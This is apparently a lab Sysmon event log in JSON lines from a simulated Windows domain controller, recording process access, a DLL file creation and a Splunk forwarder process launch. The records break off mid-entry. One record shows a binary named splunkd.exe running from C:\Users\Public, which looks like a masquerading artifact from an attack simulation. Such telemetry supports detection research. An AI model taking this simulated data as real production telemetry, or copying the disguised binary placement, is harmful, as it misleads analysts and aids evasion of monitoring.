{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4901,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4902,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4903,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.927\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001028C60600}\r\nTargetProcessId: 3468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.927","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001028C60600}","TargetProcessId":"3468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.068\r\nSourceProcessGUID: {E2A3D6B1-11C2-5F25-0000-001028C60600}\r\nSourceProcessId: 3468\r\nSourceThreadId: 872\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.068","SourceProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001028C60600}","SourceProcessId":"3468","SourceThreadId":"872","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.521\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.521","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:54:59.818\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\2.8.5.208\\Microsoft.PackageManagement.NuGetProvider.dll\r\nCreationUtcTime: 2020-08-01 06:54:59.818","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:54:59.818","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\2.8.5.208\\Microsoft.PackageManagement.NuGetProvider.dll","CreationUtcTime":"2020-08-01 06:54:59.818","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.944\r\nProcessGuid: {E2A3D6B1-11C3-5F25-0000-001096CF0600}\r\nProcessId: 4564\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.944","ProcessGuid":"{E2A3D6B1-11C3-5F25-0000-001096CF0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:59.943\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C3-5F25-0000-001096CF0600}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:59.943","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11C3-5F25-0000-001096CF0600}","TargetProcessId":"4564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program 